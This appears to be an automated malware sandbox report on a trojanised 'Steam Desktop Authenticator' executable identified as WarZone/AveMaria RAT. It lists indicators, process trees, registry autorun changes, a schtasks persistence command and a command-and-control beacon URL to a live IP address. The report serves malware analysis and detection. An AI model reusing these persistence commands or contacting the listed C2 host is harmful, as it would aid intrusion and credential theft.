File name:

SteamDesktopAuthenticator.exe

Full analysis: https://app.any.run/tasks/f7f780a9-67c3-42a4-9fa8-688c01eaf57c
Verdict: Malicious activity
Threats:

WarZone RAT is a remote access trojan, which is written in C++ and offered as a malware-as-a-service. It packs a wide range of capabilities, from stealing victims’ files and passwords to capturing desktop activities. WarZone RAT is primarily distributed via phishing emails and receives regular updates from its C2.

Malware Trends Tracker     >>>
Analysis date: January 24, 2022, 16:04:57
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
rat
stealer
avemaria
backdoor
dcrat
evasion
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

32FE1A46FF2157F06B719071BEFAB73A

SHA1:

A2D467FFC3E323B4DB1A46E42B091C64172F6F0B

SHA256:

4E4636B36B72097E974B66F818FCB3070234D3A15E13269C5E68B8F383B72746

SSDEEP:

49152:T0gtO4WdD7ZZ2u6VKtUKMjzmQdIP1aRvUV9rqOotMQIZDvMW8IRNdmpi:T0WLwHZZ2FyMjzvy9KIrRZbd7Nmo

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops executable file immediately after starts

      • SteamDesktopAuthenticator.exe (PID: 2752)
      • cmd.exe (PID: 3688)
      • DllHost.exe (PID: 3948)
      • STEAM.exe (PID: 2528)
      • cmd.exe (PID: 3740)

    • AVEMARIA was detected

      • Sdaex.exe (PID: 3280)
      • BBrowser.exe (PID: 484)
      • BBrowser.exe (PID: 4048)

    • Runs app for hidden code execution

      • Sdaex.exe (PID: 3280)
      • BBrowser.exe (PID: 484)

    • Changes the autorun value in the registry

      • Sdaex.exe (PID: 3280)
      • runtimeCrtDhcpwinCommon.exe (PID: 476)

    • Application was dropped or rewritten from another process

      • STEAM.exe (PID: 3052)
      • STEAM.exe (PID: 2528)
      • Sdaex.exe (PID: 3280)
      • BBrowser.exe (PID: 484)
      • Sdaex.exe (PID: 2632)
      • BBrowser.exe (PID: 4048)
      • runtimeCrtDhcpwinCommon.exe (PID: 476)
      • BBrowser.exe (PID: 320)
      • BBrowser.exe (PID: 3228)

    • Loads dropped or rewritten executable

      • dism.exe (PID: 3672)
      • dism.exe (PID: 3072)

    • Application was injected by another process

      • Explorer.EXE (PID: 1096)

    • Runs injected code in another process

      • BBrowser.exe (PID: 484)
      • BBrowser.exe (PID: 4048)

    • Connects to CnC server

      • BBrowser.exe (PID: 484)
      • BBrowser.exe (PID: 4048)

    • UAC/LUA settings modification

      • runtimeCrtDhcpwinCommon.exe (PID: 476)

    • Writes to the hosts file

      • runtimeCrtDhcpwinCommon.exe (PID: 476)

    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3188)
      • schtasks.exe (PID: 3944)
      • schtasks.exe (PID: 2332)
      • schtasks.exe (PID: 460)
      • schtasks.exe (PID: 2224)
      • schtasks.exe (PID: 2504)
      • schtasks.exe (PID: 4072)
      • schtasks.exe (PID: 2828)
      • schtasks.exe (PID: 2896)
      • schtasks.exe (PID: 3284)

  • SUSPICIOUS

    • Reads the computer name

      • SteamDesktopAuthenticator.exe (PID: 2752)
      • Sdaex.exe (PID: 3280)
      • cmd.exe (PID: 3688)
      • BBrowser.exe (PID: 484)
      • STEAM.exe (PID: 2528)
      • WScript.exe (PID: 1372)
      • Sdaex.exe (PID: 2632)
      • cmd.exe (PID: 3740)
      • BBrowser.exe (PID: 4048)
      • powershell.exe (PID: 2000)
      • runtimeCrtDhcpwinCommon.exe (PID: 476)
      • BBrowser.exe (PID: 320)
      • BBrowser.exe (PID: 3228)

    • Checks supported languages

      • SteamDesktopAuthenticator.exe (PID: 2752)
      • Sdaex.exe (PID: 3280)
      • cmd.exe (PID: 3688)
      • BBrowser.exe (PID: 484)
      • STEAM.exe (PID: 2528)
      • WScript.exe (PID: 1372)
      • Sdaex.exe (PID: 2632)
      • cmd.exe (PID: 3740)
      • BBrowser.exe (PID: 4048)
      • powershell.exe (PID: 2000)
      • cmd.exe (PID: 4036)
      • runtimeCrtDhcpwinCommon.exe (PID: 476)
      • BBrowser.exe (PID: 320)
      • BBrowser.exe (PID: 3228)

    • Drops a file that was compiled in debug mode

      • SteamDesktopAuthenticator.exe (PID: 2752)

    • Creates a directory in Program Files

      • Sdaex.exe (PID: 3280)
      • Sdaex.exe (PID: 2632)

    • Executable content was dropped or overwritten

      • Sdaex.exe (PID: 3280)
      • SteamDesktopAuthenticator.exe (PID: 2752)
      • cmd.exe (PID: 3688)
      • STEAM.exe (PID: 2528)
      • cmd.exe (PID: 3740)
      • DllHost.exe (PID: 3948)
      • runtimeCrtDhcpwinCommon.exe (PID: 476)

    • Starts CMD.EXE for commands execution

      • Sdaex.exe (PID: 3280)
      • BBrowser.exe (PID: 484)
      • WScript.exe (PID: 1372)

    • Starts itself from another location

      • Sdaex.exe (PID: 3280)

    • Creates files in the user directory

      • Sdaex.exe (PID: 3280)

    • Executed via COM

      • DllHost.exe (PID: 3948)

    • Drops a file with a compile date too recent

      • STEAM.exe (PID: 2528)
      • runtimeCrtDhcpwinCommon.exe (PID: 476)

    • Executes scripts

      • STEAM.exe (PID: 2528)

    • Creates files in the Windows directory

      • pkgmgr.exe (PID: 2228)
      • runtimeCrtDhcpwinCommon.exe (PID: 476)

    • Executes PowerShell scripts

      • BBrowser.exe (PID: 4048)

    • Reads Environment values

      • runtimeCrtDhcpwinCommon.exe (PID: 476)

    • Executed via WMI

      • schtasks.exe (PID: 2504)
      • schtasks.exe (PID: 3188)
      • schtasks.exe (PID: 3944)
      • schtasks.exe (PID: 4072)
      • schtasks.exe (PID: 2332)
      • schtasks.exe (PID: 2224)
      • schtasks.exe (PID: 460)
      • schtasks.exe (PID: 2828)
      • schtasks.exe (PID: 3284)
      • schtasks.exe (PID: 2896)

    • Creates executable files which already exist in Windows

      • runtimeCrtDhcpwinCommon.exe (PID: 476)

  • INFO

    • Reads the computer name

      • DllHost.exe (PID: 3948)
      • dism.exe (PID: 3672)
      • dism.exe (PID: 3072)
      • schtasks.exe (PID: 3188)
      • schtasks.exe (PID: 3944)
      • schtasks.exe (PID: 2504)
      • schtasks.exe (PID: 2332)
      • schtasks.exe (PID: 460)
      • schtasks.exe (PID: 2224)
      • schtasks.exe (PID: 2828)
      • schtasks.exe (PID: 4072)
      • schtasks.exe (PID: 2896)
      • schtasks.exe (PID: 3284)

    • Checks supported languages

      • DllHost.exe (PID: 3948)
      • pkgmgr.exe (PID: 2228)
      • dism.exe (PID: 3672)
      • makecab.exe (PID: 904)
      • pkgmgr.exe (PID: 3236)
      • dism.exe (PID: 3072)
      • makecab.exe (PID: 968)
      • schtasks.exe (PID: 3188)
      • schtasks.exe (PID: 3944)
      • schtasks.exe (PID: 2504)
      • schtasks.exe (PID: 2332)
      • schtasks.exe (PID: 460)
      • schtasks.exe (PID: 2224)
      • schtasks.exe (PID: 4072)
      • schtasks.exe (PID: 2828)
      • schtasks.exe (PID: 2896)
      • schtasks.exe (PID: 3284)

    • Checks Windows Trust Settings

      • WScript.exe (PID: 1372)
      • powershell.exe (PID: 2000)

    • Reads settings of System Certificates

      • powershell.exe (PID: 2000)

    • Manual execution by user

      • BBrowser.exe (PID: 320)
      • BBrowser.exe (PID: 3228)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

Subsystem: Windows GUI
SubsystemVersion: 5.1
ImageVersion: -
OSVersion: 5.1
EntryPoint: 0x1ea80
UninitializedDataSize: -
InitializedDataSize: 82944
CodeSize: 200704
LinkerVersion: 14
PEType: PE32
TimeStamp: 2020:06:25 12:38:24+02:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 25-Jun-2020 10:38:24
Detected languages:
  • Process Default Language
Debug artifacts:
  • D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000118

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 6
Time date stamp: 25-Jun-2020 10:38:24
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x00030F2A
0x00031000
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
6.70442
.rdata
0x00032000
0x0000A5F2
0x0000A600
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
5.2593
.data
0x0003D000
0x00023720
0x00001000
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
3.70568
.didat
0x00061000
0x00000188
0x00000200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
3.29951
.rsrc
0x00062000
0x00006670
0x00006800
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
6.47251
.reloc
0x00069000
0x00002264
0x00002400
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
6.55675

Resources

Title
Entropy
Size
Codepage
Language
Type
1
5.25329
1875
Latin 1 / Western European
UNKNOWN
RT_MANIFEST
7
3.66634
508
Latin 1 / Western European
UNKNOWN
RT_STRING
8
3.71728
582
Latin 1 / Western European
UNKNOWN
RT_STRING
9
3.73856
422
Latin 1 / Western European
UNKNOWN
RT_STRING
10
3.55807
220
Latin 1 / Western European
UNKNOWN
RT_STRING
11
3.89762
1124
Latin 1 / Western European
UNKNOWN
RT_STRING
12
3.68258
356
Latin 1 / Western European
UNKNOWN
RT_STRING
13
3.61824
272
Latin 1 / Western European
UNKNOWN
RT_STRING
14
3.61995
344
Latin 1 / Western European
UNKNOWN
RT_STRING
15
3.4037
232
Latin 1 / Western European
UNKNOWN
RT_STRING

Imports

KERNEL32.dll
USER32.dll (delay-loaded)
gdiplus.dll
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
81
Monitored processes
35
Malicious processes
5
Suspicious processes
5

Behavior graph

Click at the process to see the details
drop and start drop and start drop and start start drop and start inject steamdesktopauthenticator.exe #AVEMARIA sdaex.exe #AVEMARIA bbrowser.exe cmd.exe steam.exe no specs steam.exe Copy/Move/Rename/Delete/Link Object wscript.exe no specs pkgmgr.exe no specs pkgmgr.exe makecab.exe no specs dism.exe no specs sdaex.exe no specs cmd.exe pkgmgr.exe no specs pkgmgr.exe makecab.exe no specs dism.exe no specs #AVEMARIA bbrowser.exe explorer.exe powershell.exe no specs cmd.exe no specs runtimecrtdhcpwincommon.exe bbrowser.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs bbrowser.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
304"C:\Windows\system32\pkgmgr.exe" /n:%temp%\ellocnak.xmlC:\Windows\system32\pkgmgr.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Package Manager
Exit code:
3221226540
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\pkgmgr.exe
c:\windows\system32\ntdll.dll
320"C:\Users\admin\AppData\Roaming\BBrowser.exe"C:\Users\admin\AppData\Roaming\BBrowser.exeExplorer.EXE
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\roaming\bbrowser.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
460schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0018-040C-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /fC:\Windows\system32\schtasks.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
476"C:\runtimeCrtDhcp\runtimeCrtDhcpwinCommon.exe"C:\runtimeCrtDhcp\runtimeCrtDhcpwinCommon.exe
cmd.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Version:
2019.4.15.16511847
Modules
Images
c:\runtimecrtdhcp\runtimecrtdhcpwincommon.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
484"C:\Users\admin\AppData\Roaming\BBrowser.exe"C:\Users\admin\AppData\Roaming\BBrowser.exe
Sdaex.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\roaming\bbrowser.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
904"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220124160505.log C:\Windows\Logs\CBS\CbsPersist_20220124160505.cabC:\Windows\system32\makecab.exepkgmgr.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft� Cabinet Maker
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\makecab.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\version.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
968"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220124160505.log C:\Windows\Logs\CBS\CbsPersist_20220124160505.cabC:\Windows\system32\makecab.exepkgmgr.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft� Cabinet Maker
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\makecab.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\version.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1096C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
1372"C:\Windows\System32\WScript.exe" "C:\runtimeCrtDhcp\P9gyGMWaVKkpMztjrXqxZIEFLjz.vbe" C:\Windows\System32\WScript.exeSTEAM.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft � Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\wscript.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1696"C:\Windows\system32\pkgmgr.exe" /n:%temp%\ellocnak.xmlC:\Windows\system32\pkgmgr.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Package Manager
Exit code:
3221226540
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\pkgmgr.exe
c:\windows\system32\ntdll.dll
Total events
7 749
Read events
7 638
Write events
111
Delete events
0

Modification events

(PID) Process:(2752) SteamDesktopAuthenticator.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2752) SteamDesktopAuthenticator.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2752) SteamDesktopAuthenticator.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2752) SteamDesktopAuthenticator.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(3280) Sdaex.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:MaxConnectionsPer1_0Server
Value:
10
(PID) Process:(3280) Sdaex.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:MaxConnectionsPerServer
Value:
10
(PID) Process:(3280) Sdaex.exeKey:HKEY_CURRENT_USER\Software\_rptls
Operation:writeName:Install
Value:
C:\Users\admin\AppData\Local\Temp\RarSFX0\Sdaex.exe
(PID) Process:(3280) Sdaex.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WM19U40ZEN
Operation:writeName:inst
Value:
D38E5095C511B852B059BB326BE4D987F2CF796F26BDA153C9E45CDC0B50EFC6E9AFAB5315C333CCA5FBA09B99D258A92F2418BF0BFB00297469DB3665B142D18936A01E29A39BAD88D415A1046A5B98DD5E39124B7B6357
(PID) Process:(3280) Sdaex.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Google
Value:
C:\Users\admin\AppData\Roaming\BBrowser.exe
(PID) Process:(2528) STEAM.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
Executable files
32
Suspicious files
2
Text files
14
Unknown types
2

Dropped files

PID
Process
Filename
Type
2228pkgmgr.exeC:\Windows\Logs\CBS\CbsPersist_20220124160505.log
MD5:
SHA256:
2752SteamDesktopAuthenticator.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\Sdaex.exeexecutable
MD5:
SHA256:
2528STEAM.exeC:\runtimeCrtDhcp\P9gyGMWaVKkpMztjrXqxZIEFLjz.vbevbe
MD5:
SHA256:
476runtimeCrtDhcpwinCommon.exeC:\MSOCache\All Users\{90140000-0044-0411-0000-0000000FF1CE}-C\WmiPrvSE.exeexecutable
MD5:
SHA256:
476runtimeCrtDhcpwinCommon.exeC:\MSOCache\All Users\{90140000-00BA-0411-0000-0000000FF1CE}-C\WmiPrvSE.exeexecutable
MD5:
SHA256:
476runtimeCrtDhcpwinCommon.exeC:\Windows\System32\TapiMigPlugin\taskeng.exeexecutable
MD5:
SHA256:
476runtimeCrtDhcpwinCommon.exeC:\Windows\System32\drivers\etc\hoststext
MD5:
SHA256:
476runtimeCrtDhcpwinCommon.exeC:\MSOCache\All Users\{90140000-00BA-0411-0000-0000000FF1CE}-C\24dbde2999530etext
MD5:
SHA256:
476runtimeCrtDhcpwinCommon.exeC:\MSOCache\All Users\{90140000-0044-0411-0000-0000000FF1CE}-C\24dbde2999530etext
MD5:
SHA256:
2528STEAM.exeC:\runtimeCrtDhcp\lBaELawyhQPdp.battext
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
161
TCP/UDP connections
72
DNS requests
27
Threats
19

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
92.63.192.30:80
http://92.63.192.30/generatorServer/PrefWarWarlimit/coreAutoantianti/mobilelog/tracemessagelocal/log/pluginprod/prodcorescriptsupport/screensupportlimit/Python/mobilemessageCampool/screenCpuMath/binlogmobileDjango/Eternalsecuredefaultasynctemp.php?fc=uUo&1eebb7a59bb452a4fa2ba4d81c7f2708=wNzAjY0QWM3cDNycTNwQWNxQWYxQjMxEWMjdDZ3QDNidzMwgjNklTY5kzNxADM1IzMxIjN0YzM&0043bfc907801f9e09a2ddd9a0d6b133=gYldTOyEmNwUGN0UjM1czY0EmMhdjZ4UGO3QTZxMzMzQWZwIWNjVWM&09d46846ddb160396d5a9a4a82068a5e=d1nI2UWMxgTYlVjN4EmY1EWO4UGZ0YGO5E2M2UWZ4YGNycTZwMWNilzNhJiOiQ2M4IzM5ADZzkjN2QTN2MDN3YjMiNGZyUmMkZjNkR2YiwiIzYWZ4QWNyEWZ1EzNwMDZxAzM2QDN2EWY2YWYjBzMmZGZxcjYjFjYlJiOiAjZzgDZ0Y2NwkTZ1cjNlJGZ1QTZyQGM0Y2N3MTNjRGOis3W&2390c8a7a9d8f094dc49c08bc9220380=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
RU
text
104 b
malicious
GET
200
92.63.192.30:80
